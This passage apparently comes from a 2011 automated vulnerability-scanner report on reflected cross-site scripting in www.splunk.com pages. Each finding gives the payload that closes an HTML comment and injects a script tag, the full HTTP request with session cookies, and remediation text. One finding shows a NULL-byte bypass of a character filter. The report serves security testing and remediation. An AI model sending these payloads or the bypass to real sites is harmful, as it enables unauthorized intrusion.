This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/previous_releases88d0b--><script>alert(1)</script>8b1623a164f HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.439. http://www.splunk.com/page/previous_releases [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/previous_releases
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e3446--><script>alert(1)</script>57678c0f931 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/previous_releases?e3446--><script>alert(1)</script>57678c0f931=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 58901932b283046a182ab6097919c9121296943995 Last-Modified: Sat, 05 Feb 2011 22:13:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 403596
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 995dc--><script>alert(1)</script>52186db0835 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page995dc--><script>alert(1)</script>52186db0835/release_rss HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:01 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:01 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:01 GMT; path=/ ETag: c3223f52d0b0feb63946485c5318d8481296943861 Last-Modified: Sat, 05 Feb 2011 22:11:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 7aadb--><script>alert(1)</script>320c10f06c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/release_rss7aadb--><script>alert(1)</script>320c10f06c6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload f0ac2--><script>alert(1)</script>9126f41049b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagef0ac2--><script>alert(1)</script>9126f41049b/road_map_vote HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:47 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:47 GMT; path=/ ETag: e9605f41e84a45812a6eafba56d906191296943907 Last-Modified: Sat, 05 Feb 2011 22:11:47 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1b364--><script>alert(1)</script>f6aac3c258f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/road_map_vote1b364--><script>alert(1)</script>f6aac3c258f HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18238
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.444. http://www.splunk.com/page/road_map_vote [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/road_map_vote
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3cfea--><script>alert(1)</script>a7d560f0de6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/road_map_vote?3cfea--><script>alert(1)</script>a7d560f0de6=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 60e05d87f0138b605f90e52da6396c2d1296943874 Last-Modified: Sat, 05 Feb 2011 22:11:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20645
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 355e5--><script>alert(1)</script>5557b96b483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page355e5--><script>alert(1)</script>5557b96b483/securelink/signup/Splunk_Company_Overview HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 23c1d--><script>alert(1)</script>d5968d369aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelink23c1d--><script>alert(1)</script>d5968d369aa/signup/Splunk_Company_Overview HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:20 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %00db176--><script>alert(1)</script>e09126c71f5 was submitted in the REST URL parameter 4. This input was echoed as db176--><script>alert(1)</script>e09126c71f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_Company_Overview%00db176--><script>alert(1)</script>e09126c71f5 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload bb85d--><script>alert(1)</script>b022b7455e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagebb85d--><script>alert(1)</script>b022b7455e4/securelink/signup/Splunk_Executive_Brief HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload ae00b--><script>alert(1)</script>981d7f94957 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelinkae00b--><script>alert(1)</script>981d7f94957/signup/Splunk_Executive_Brief HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; 